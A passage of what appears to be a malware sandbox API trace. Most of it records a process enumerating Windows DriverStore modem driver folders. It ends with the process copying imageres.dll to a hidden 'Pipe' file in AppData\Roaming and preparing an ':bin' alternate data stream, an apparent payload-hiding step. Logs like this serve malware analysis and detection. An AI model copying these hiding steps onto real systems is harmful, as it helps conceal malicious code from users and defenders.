ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.185] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.185] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl008.inf_amd64_neutral_d225e15af1a594cd\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x486e8b6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66987b63, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66987b63, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.186] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.186] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl009.inf_amd64_neutral_bed6224f27f5c478\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4881966d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x669f9f84, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x669f9f84, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.186] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.186] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl010.inf_amd64_neutral_46f466c9e68abb4a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489702cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66a6c3a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66a6c3a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.187] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.187] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgsm.inf_amd64_neutral_dd3fbd8c64c7c87d\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b6843c2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x682f86b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x682f86b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.187] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.187] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhaeu.inf_amd64_neutral_6611a858035bf482\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b71c943, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6831e813, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6831e813, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.188] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.188] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhandy.inf_amd64_neutral_386661b46df6da3f\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b7db025, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6836aad3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6836aad3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.188] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.188] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhay2.inf_amd64_neutral_ff250f861d941dd8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b8bf866, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x683b6d94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x683b6d94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.189] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.189] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmhayes.inf_amd64_neutral_507db5d34d7acddc\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b9f0369, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68618398, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68618398, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.196] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.196] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdminfot.inf_amd64_neutral_fc6bcd80e9e6a3c3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bad4baa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68664659, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68664659, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.196] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.196] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bbdf54c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6889fafd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6889fafd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.197] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.197] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmirmdm.inf_amd64_neutral_fadec14b0a37b637\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b8ca79, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6ad510, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6ad510, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.198] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.198] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmisdn.inf_amd64_neutral_061c61abd3904560\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bc9dc2e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x688c5c5d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x688c5c5d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.198] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.198] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmjf56e.inf_amd64_neutral_328dabbf0aeed9bc\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bd8246f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.199] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.199] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmke.inf_amd64_neutral_3e4daa83122b1559\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4be1a9f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68911f1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68911f1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.199] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.199] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmkortx.inf_amd64_neutral_1975687236603184\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bed90d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6893807e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6893807e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.200] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.200] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4bf71653, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6898433e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6898433e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.200] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.200] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlasno.inf_amd64_neutral_c86d5b5e5fa8b48a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c055e94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x689aa49f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x689aa49f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.201] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.202] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmlucnt.inf_amd64_neutral_642a5ab3f2a1ae20\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c114576, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68be5943, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68be5943, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.202] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.203] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmc288.inf_amd64_neutral_c4a901dab689ad79\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c1d2c57, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68dfac87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68dfac87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.203] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.203] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcd.inf_amd64_neutral_49212f5920298e45\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c291338, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.203] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.203] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmcom.inf_amd64_neutral_716a306ec3899e04\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c34fa1a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e20de7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e20de7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.204] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.204] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmct.inf_amd64_neutral_15bb3ed734fbbeb3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c43425c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e6d0a7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e6d0a7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.204] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.204] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmega.inf_amd64_neutral_f9c441ed24f00358\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c4f293d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68e93208, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68e93208, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.205] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.206] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmetri.inf_amd64_neutral_f89b8a357327f615\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c5d717f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68eb9368, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68eb9368, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.206] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.206] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c6e1b20, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f2b789, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f2b789, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.206] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.206] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmhzel.inf_amd64_neutral_1292ec506cfc26db\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c85e8e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68f9dbaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68f9dbaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.207] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.207] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmminij.inf_amd64_neutral_7c300346e830b2dc\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c969285, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6903612b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6903612b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.207] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.208] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmod.inf_amd64_neutral_5766736c47b90fff\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ca01806, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x690823eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x690823eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.208] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.208] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmmot64.inf_amd64_neutral_1abbad2f29c8fa08\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bf318, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c1285e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c1285e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.208] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.209] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0027.677] lstrcpyW (in: lpString1=0x5e07ac, lpString2="Pipe" | out: lpString1="Pipe") returned="Pipe" [0027.677] CopyFileW (lpExistingFileName="\\\\?\\C:\\Windows\\system32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe"), bFailIfExists=1) returned 1 [0028.918] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe", dwFileAttributes=0x2) returned 1 [0028.919] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba910 | out: hHeap=0x5a0000) returned 1 [0028.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe", lpString2=":bin" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin") returned="C:\\Users\\5p5NrGJn0jS 